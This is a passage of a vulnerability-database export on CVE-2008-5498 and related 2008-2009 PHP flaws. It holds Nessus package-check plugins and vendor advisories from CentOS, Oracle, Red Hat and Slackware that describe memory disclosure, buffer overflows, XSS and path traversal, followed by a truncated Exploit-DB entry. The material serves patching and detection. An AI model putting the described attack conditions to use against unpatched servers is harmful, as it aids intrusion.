reference:\"php-domxml-4.3.9-3.22.15\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"php-gd-4.3.9-3.22.15\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"php-imap-4.3.9-3.22.15\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"php-ldap-4.3.9-3.22.15\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"php-mbstring-4.3.9-3.22.15\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"php-mysql-4.3.9-3.22.15\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"php-ncurses-4.3.9-3.22.15\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"php-odbc-4.3.9-3.22.15\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"php-pear-4.3.9-3.22.15\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"php-pgsql-4.3.9-3.22.15\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"php-snmp-4.3.9-3.22.15\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"php-xmlrpc-4.3.9-3.22.15\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-devel / php-domxml / php-gd / php-imap / php-ldap / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:43:59", "description": "According to CVE-2008-5498 entry :\n\nArray index error in the 'imageRotate' function in PHP 5.2.8 and\nearlier allows context-dependent attackers to read the contents of\narbitrary memory locations via a crafted value of the third argument\n(aka the 'bgd_color' or 'clrBack' argument) for an indexed image.", "edition": 26, "published": "2009-02-04T00:00:00", "title": "FreeBSD : php5-gd -- uninitialized memory information disclosure vulnerability (58a3c266-db01-11dd-ae30-001cc0377035)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5498"], "modified": "2009-02-04T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:php5-gd", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_58A3C266DB0111DDAE30001CC0377035.NASL", "href": "https://www.tenable.com/plugins/nessus/35583", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(35583);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2008-5498\");\n script_bugtraq_id(33002);\n\n script_name(english:\"FreeBSD : php5-gd -- uninitialized memory information disclosure vulnerability (58a3c266-db01-11dd-ae30-001cc0377035)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"According to CVE-2008-5498 entry :\n\nArray index error in the 'imageRotate' function in PHP 5.2.8 and\nearlier allows context-dependent attackers to read the contents of\narbitrary memory locations via a crafted value of the third argument\n(aka the 'bgd_color' or 'clrBack' argument) for an indexed image.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.securiteam.com/unixfocus/6G00Y0ANFU.html\"\n );\n # https://vuxml.freebsd.org/freebsd/58a3c266-db01-11dd-ae30-001cc0377035.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?230ab5d8\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(200);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php5-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/12/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/01/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/02/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"php5-gd<=5.2.8\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-17T09:10:26", "description": "New php packages are available for Slackware 11.0, 12.0, 12.1, 12.2,\nand -current to fix security issues.", "edition": 24, "published": "2009-04-08T00:00:00", "title": "Slackware 11.0 / 12.0 / 12.1 / 12.2 / current : php (SSA:2009-098-02)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5498"], "modified": "2009-04-08T00:00:00", "cpe": ["cpe:/o:slackware:slackware_linux:12.0", "cpe:/o:slackware:slackware_linux:12.2", "p-cpe:/a:slackware:slackware_linux:php", "cpe:/o:slackware:slackware_linux:11.0", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:12.1"], "id": "SLACKWARE_SSA_2009-098-02.NASL", "href": "https://www.tenable.com/plugins/nessus/36105", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2009-098-02. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(36105);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-5498\");\n script_bugtraq_id(33002);\n script_xref(name:\"SSA\", value:\"2009-098-02\");\n\n script_name(english:\"Slackware 11.0 / 12.0 / 12.1 / 12.2 / current : php (SSA:2009-098-02)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New php packages are available for Slackware 11.0, 12.0, 12.1, 12.2,\nand -current to fix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2009&m=slackware-security.381314\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?36e4e7dd\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(200);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:11.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/04/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"11.0\", pkgname:\"php\", pkgver:\"5.2.9\", pkgarch:\"i486\", pkgnum:\"1_slack11.0\")) flag++;\n\nif (slackware_check(osver:\"12.0\", pkgname:\"php\", pkgver:\"5.2.9\", pkgarch:\"i486\", pkgnum:\"1_slack12.0\")) flag++;\n\nif (slackware_check(osver:\"12.1\", pkgname:\"php\", pkgver:\"5.2.9\", pkgarch:\"i486\", pkgnum:\"1_slack12.1\")) flag++;\n\nif (slackware_check(osver:\"12.2\", pkgname:\"php\", pkgver:\"5.2.9\", pkgarch:\"i486\", pkgnum:\"1_slack12.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"php\", pkgver:\"5.2.9\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:slackware_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "centos": [{"lastseen": "2019-12-20T18:23:55", "bulletinFamily": "unix", "cvelist": ["CVE-2009-0754", "CVE-2008-3658", "CVE-2008-3660", "CVE-2008-5498", "CVE-2008-5557"], "description": "**CentOS Errata and Security Advisory** CESA-2009:0337\n\n\nPHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Web server.\n\nA heap-based buffer overflow flaw was found in PHP's mbstring extension. A\nremote attacker able to pass arbitrary input to a PHP script using mbstring\nconversion functions could cause the PHP interpreter to crash or,\npossibly, execute arbitrary code. (CVE-2008-5557)\n\nA flaw was found in the handling of the \"mbstring.func_overload\"\nconfiguration setting. A value set for one virtual host, or in a user's\n.htaccess file, was incorrectly applied to other virtual hosts on the same\nserver, causing the handling of multibyte character strings to not work\ncorrectly. (CVE-2009-0754)\n\nA buffer overflow flaw was found in PHP's imageloadfont function. If a PHP\nscript allowed a remote attacker to load a carefully crafted font file, it\ncould cause the PHP interpreter to crash or, possibly, execute arbitrary\ncode. (CVE-2008-3658)\n\nA flaw was found in the way PHP handled certain file extensions when\nrunning in FastCGI mode. If the PHP interpreter was being executed via\nFastCGI, a remote attacker could create a request which would cause the PHP\ninterpreter to crash. (CVE-2008-3660)\n\nA memory disclosure flaw was found in the PHP gd extension's imagerotate\nfunction. A remote attacker able to pass arbitrary values as the\n\"background color\" argument of the function could, possibly, view portions\nof the PHP interpreter's memory. (CVE-2008-5498)\n\nAll php users are advised to upgrade to these updated packages, which\ncontain backported patches to resolve these issues. The httpd web server\nmust be restarted for the changes to take effect.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2009-April/027756.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-April/027757.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-April/027758.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-April/027759.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-April/027760.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-April/027761.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-April/027844.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-April/027845.html\n\n**Affected packages:**\nphp\nphp-devel\nphp-domxml\nphp-gd\nphp-imap\nphp-ldap\nphp-mbstring\nphp-mysql\nphp-ncurses\nphp-odbc\nphp-pear\nphp-pgsql\nphp-snmp\nphp-xmlrpc\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2009-0337.html", "edition": 4, "modified": "2009-04-20T18:49:21", "published": "2009-04-06T17:44:07", "href": "http://lists.centos.org/pipermail/centos-announce/2009-April/027756.html", "id": "CESA-2009:0337", "title": "php security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-20T18:27:58", "bulletinFamily": "unix", "cvelist": ["CVE-2009-0754", "CVE-2008-3658", "CVE-2008-3660", "CVE-2008-5814", "CVE-2008-5498", "CVE-2008-5557"], "description": "**CentOS Errata and Security Advisory** CESA-2009:0338\n\n\nPHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Web server.\n\nA heap-based buffer overflow flaw was found in PHP's mbstring extension. A\nremote attacker able to pass arbitrary input to a PHP script using mbstring\nconversion functions could cause the PHP interpreter to crash or,\npossibly, execute arbitrary code. (CVE-2008-5557)\n\nA flaw was found in the handling of the \"mbstring.func_overload\"\nconfiguration setting. A value set for one virtual host, or in a user's\n.htaccess file, was incorrectly applied to other virtual hosts on the same\nserver, causing the handling of multibyte character strings to not work\ncorrectly. (CVE-2009-0754)\n\nA buffer overflow flaw was found in PHP's imageloadfont function. If a PHP\nscript allowed a remote attacker to load a carefully crafted font file, it\ncould cause the PHP interpreter to crash or, possibly, execute arbitrary\ncode. (CVE-2008-3658)\n\nA flaw was found in the way PHP handled certain file extensions when\nrunning in FastCGI mode. If the PHP interpreter was being executed via\nFastCGI, a remote attacker could create a request which would cause the PHP\ninterpreter to crash. (CVE-2008-3660)\n\nA memory disclosure flaw was found in the PHP gd extension's imagerotate\nfunction. A remote attacker able to pass arbitrary values as the\n\"background color\" argument of the function could, possibly, view portions\nof the PHP interpreter's memory. (CVE-2008-5498)\n\nA cross-site scripting flaw was found in a way PHP reported errors for\ninvalid cookies. If the PHP interpreter had \"display_errors\" enabled, a\nremote attacker able to set a specially-crafted cookie on a victim's system\ncould possibly inject arbitrary HTML into an error message generated by\nPHP. (CVE-2008-5814)\n\nAll php users are advised to upgrade to these updated packages, which\ncontain backported patches to resolve these issues. The httpd web server\nmust be restarted for the changes to take effect.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2009-April/027762.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-April/027763.html\n\n**Affected packages:**\nphp\nphp-bcmath\nphp-cli\nphp-common\nphp-dba\nphp-devel\nphp-gd\nphp-imap\nphp-ldap\nphp-mbstring\nphp-mysql\nphp-ncurses\nphp-odbc\nphp-pdo\nphp-pgsql\nphp-snmp\nphp-soap\nphp-xml\nphp-xmlrpc\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2009-0338.html", "edition": 3, "modified": "2009-04-07T12:21:16", "published": "2009-04-07T12:21:16", "href": "http://lists.centos.org/pipermail/centos-announce/2009-April/027762.html", "id": "CESA-2009:0338", "title": "php security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:34:15", "bulletinFamily": "unix", "cvelist": ["CVE-2009-0754", "CVE-2008-3658", "CVE-2008-3660", "CVE-2008-5498", "CVE-2008-5557"], "description": "[4.3.9-3.22.15]\n- fix merge of CVE-2008-3658 patch\n[4.3.9-3.22.14]\n- add security fixes for CVE-2008-3658, CVE-2008-3660,\n CVE-2008-5498, CVE-2008-5557, CVE-2009-0754 (#487360)\n- split out gd overflow2() and make global with sane symbol name", "edition": 4, "modified": "2009-04-06T00:00:00", "published": "2009-04-06T00:00:00", "id": "ELSA-2009-0337", "href": "http://linux.oracle.com/errata/ELSA-2009-0337.html", "title": "php security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:26", "bulletinFamily": "unix", "cvelist": ["CVE-2009-0754", "CVE-2008-3658", "CVE-2008-3660", "CVE-2008-5814", "CVE-2007-3996", "CVE-2008-5498", "CVE-2008-5557"], "description": "[5.1.6-23.2.el5]\n- ext/gd: fix overflow2 usage for CVE-2007-3996, CVE-2008-3658\n[5.1.6-23.1.el5]\n- add security fixes for CVE-2008-3658, CVE-2008-3660,\n CVE-2008-5498, CVE-2008-5557, CVE-2008-5814, and mbstring\n func_overload issue (#487369)", "edition": 4, "modified": "2009-04-06T00:00:00", "published": "2009-04-06T00:00:00", "id": "ELSA-2009-0338", "href": "http://linux.oracle.com/errata/ELSA-2009-0338.html", "title": "php security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:44:49", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3658", "CVE-2008-3660", "CVE-2008-5498", "CVE-2008-5557", "CVE-2009-0754"], "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Web server.\n\nA heap-based buffer overflow flaw was found in PHP's mbstring extension. A\nremote attacker able to pass arbitrary input to a PHP script using mbstring\nconversion functions could cause the PHP interpreter to crash or,\npossibly, execute arbitrary code. (CVE-2008-5557)\n\nA flaw was found in the handling of the \"mbstring.func_overload\"\nconfiguration setting. A value set for one virtual host, or in a user's\n.htaccess file, was incorrectly applied to other virtual hosts on the same\nserver, causing the handling of multibyte character strings to not work\ncorrectly. (CVE-2009-0754)\n\nA buffer overflow flaw was found in PHP's imageloadfont function. If a PHP\nscript allowed a remote attacker to load a carefully crafted font file, it\ncould cause the PHP interpreter to crash or, possibly, execute arbitrary\ncode. (CVE-2008-3658)\n\nA flaw was found in the way PHP handled certain file extensions when\nrunning in FastCGI mode. If the PHP interpreter was being executed via\nFastCGI, a remote attacker could create a request which would cause the PHP\ninterpreter to crash. (CVE-2008-3660)\n\nA memory disclosure flaw was found in the PHP gd extension's imagerotate\nfunction. A remote attacker able to pass arbitrary values as the\n\"background color\" argument of the function could, possibly, view portions\nof the PHP interpreter's memory. (CVE-2008-5498)\n\nAll php users are advised to upgrade to these updated packages, which\ncontain backported patches to resolve these issues. The httpd web server\nmust be restarted for the changes to take effect.", "modified": "2018-05-26T04:26:17", "published": "2009-04-06T04:00:00", "id": "RHSA-2009:0337", "href": "https://access.redhat.com/errata/RHSA-2009:0337", "type": "redhat", "title": "(RHSA-2009:0337) Moderate: php security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:38", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3658", "CVE-2008-3660", "CVE-2008-5498", "CVE-2008-5557", "CVE-2008-5814", "CVE-2009-0754"], "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Web server.\n\nA heap-based buffer overflow flaw was found in PHP's mbstring extension. A\nremote attacker able to pass arbitrary input to a PHP script using mbstring\nconversion functions could cause the PHP interpreter to crash or,\npossibly, execute arbitrary code. (CVE-2008-5557)\n\nA flaw was found in the handling of the \"mbstring.func_overload\"\nconfiguration setting. A value set for one virtual host, or in a user's\n.htaccess file, was incorrectly applied to other virtual hosts on the same\nserver, causing the handling of multibyte character strings to not work\ncorrectly. (CVE-2009-0754)\n\nA buffer overflow flaw was found in PHP's imageloadfont function. If a PHP\nscript allowed a remote attacker to load a carefully crafted font file, it\ncould cause the PHP interpreter to crash or, possibly, execute arbitrary\ncode. (CVE-2008-3658)\n\nA flaw was found in the way PHP handled certain file extensions when\nrunning in FastCGI mode. If the PHP interpreter was being executed via\nFastCGI, a remote attacker could create a request which would cause the PHP\ninterpreter to crash. (CVE-2008-3660)\n\nA memory disclosure flaw was found in the PHP gd extension's imagerotate\nfunction. A remote attacker able to pass arbitrary values as the\n\"background color\" argument of the function could, possibly, view portions\nof the PHP interpreter's memory. (CVE-2008-5498)\n\nA cross-site scripting flaw was found in a way PHP reported errors for\ninvalid cookies. If the PHP interpreter had \"display_errors\" enabled, a\nremote attacker able to set a specially-crafted cookie on a victim's system\ncould possibly inject arbitrary HTML into an error message generated by\nPHP. (CVE-2008-5814)\n\nAll php users are advised to upgrade to these updated packages, which\ncontain backported patches to resolve these issues. The httpd web server\nmust be restarted for the changes to take effect.", "modified": "2017-09-08T12:08:43", "published": "2009-04-06T04:00:00", "id": "RHSA-2009:0338", "href": "https://access.redhat.com/errata/RHSA-2009:0338", "type": "redhat", "title": "(RHSA-2009:0338) Moderate: php security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:51", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3658", "CVE-2008-3660", "CVE-2008-5498", "CVE-2008-5557", "CVE-2008-5658", "CVE-2008-5814", "CVE-2009-0754", "CVE-2009-1271"], "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Web server.\n\nA heap-based buffer overflow flaw was found in PHP's mbstring extension. A\nremote attacker able to pass arbitrary input to a PHP script using mbstring\nconversion functions could cause the PHP interpreter to crash or, possibly,\nexecute arbitrary code. (CVE-2008-5557)\n\nA flaw was found in the handling of the \"mbstring.func_overload\"\nconfiguration setting. A value set for one virtual host, or in a user's\n.htaccess file, was incorrectly applied to other virtual hosts on the same\nserver, causing the handling of multibyte character strings to not work\ncorrectly. (CVE-2009-0754)\n\nA directory traversal flaw was found in PHP's ZipArchive::extractTo\nfunction. If PHP is used to extract a malicious ZIP archive, it could allow\nan attacker to write arbitrary files anywhere the PHP process has write\npermissions. (CVE-2008-5658)\n\nA buffer overflow flaw was found in PHP's imageloadfont function. If a PHP\nscript allowed a remote attacker to load a carefully crafted font file, it\ncould cause the PHP interpreter to crash or, possibly, execute arbitrary\ncode. (CVE-2008-3658)\n\nA flaw was found in the way PHP handled certain file extensions when\nrunning in FastCGI mode. If the PHP interpreter was being executed via\nFastCGI, a remote attacker could create a request which would cause the PHP\ninterpreter to crash. (CVE-2008-3660)\n\nA memory disclosure flaw was found in the PHP gd extension's imagerotate\nfunction. A remote attacker able to pass arbitrary values as the\n\"background color\" argument of the function could, possibly, view portions\nof the PHP interpreter's memory. (CVE-2008-5498)\n\nA cross-site scripting flaw was found in a way PHP reported errors for\ninvalid cookies. If the PHP interpreter had \"display_errors\" enabled, a\nremote attacker able to set a specially-crafted cookie on a victim's system\ncould possibly inject arbitrary HTML into an error message generated by\nPHP. (CVE-2008-5814)\n\nA flaw was found in PHP's json_decode function. A remote attacker could use\nthis flaw to create a specially-crafted string which could cause the PHP\ninterpreter to crash while being decoded in a PHP script. (CVE-2009-1271)\n\nAll php users are advised to upgrade to these updated packages, which\ncontain backported patches to resolve these issues. The httpd web server\nmust be restarted for the changes to take effect.", "modified": "2019-03-22T23:44:59", "published": "2009-04-14T04:00:00", "id": "RHSA-2009:0350", "href": "https://access.redhat.com/errata/RHSA-2009:0350", "type": "redhat", "title": "(RHSA-2009:0350) Moderate: php security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "slackware": [{"lastseen": "2019-05-30T07:37:09", "bulletinFamily": "unix", "cvelist": ["CVE-2008-5498"], "description": "New php packages are available for Slackware 11.0, 12.0, 12.1, 12.2,\nand -current to fix security issues.\n\nMore details about this issue may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5498\n\n\nHere are the details from the Slackware 12.2 ChangeLog:\n\npatches/packages/php-5.2.9-i486-1_slack12.2.tgz: Upgraded to php-5.2.9.\n This update fixes a few security issues:\n - Fixed a crash on extract in zip when files or directories entry names\n contain a relative path.\n - Fixed security issue in imagerotate(), background colour isn't validated\n correctly with a non truecolour image. (CVE-2008-5498)\n Reported by Hamid Ebadi, APA Laboratory.\n - Fixed a segfault when malformed string is passed to json_decode().\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5498\n (* Security fix *)\n\nWhere to find the new packages:\n\nUpdated package for Slackware 11.0:\nftp://ftp.slackware.com/pub/slackware/slackware-11.0/extra/php5/php-5.2.9-i486-1_slack11.0.tgz\n\nUpdated package for Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/php-5.2.9-i486-1_slack12.0.tgz\n\nUpdated package for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/php-5.2.9-i486-1_slack12.1.tgz\n\nUpdated package for Slackware 12.2:\nftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/php-5.2.9-i486-1_slack12.2.tgz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/php-5.2.9-i486-1.tgz\n\n\nMD5 signatures:\n\nSlackware 11.0 package:\n0f37384585ba9b364f1fcf3260ed934a php-5.2.9-i486-1_slack11.0.tgz\n\nSlackware 12.0 package:\nb959206d13d76f58ef92489f569b7ff8 php-5.2.9-i486-1_slack12.0.tgz\n\nSlackware 12.1 package:\nbab5d4abc502a0a5dc1831943a5fd1a7 php-5.2.9-i486-1_slack12.1.tgz\n\nSlackware 12.2 package:\ne3c82331a09e0edb6be009e57b2569c9 php-5.2.9-i486-1_slack12.2.tgz\n\nSlackware -current package:\naf4de16b609b4e797dd0fc0a9f4c84d8 php-5.2.9-i486-1.tgz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg php-5.2.9-i486-1_slack12.2.tgz\n\nThen, restart the web server.", "modified": "2009-04-07T23:29:51", "published": "2009-04-07T23:29:51", "id": "SSA-2009-098-02", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2009&m=slackware-security.381314", "type": "slackware", "title": "php", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "exploitdb": [{"lastseen": "2016-02-01T03:40:50", "description": "PHP <= 5.2.8 gd library - imageRotate() Information Leak Vulnerability. CVE-2008-5498. Local exploits for multiple platform", "published": "2009-01-02T00:00:00", "type": "exploitdb", "title": "PHP <= 5.2.8 gd library - imageRotate Information Leak Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-5498"], "modified": "2009-01-02T00:00:00", "id": "EDB-ID:7646", "href": "https://www.exploit-db.com/exploits/7646/", "sourceData": "PHP - gd library - imageRotate()function Information Leak Vulnerability\n\nDiscovered by: Hamid 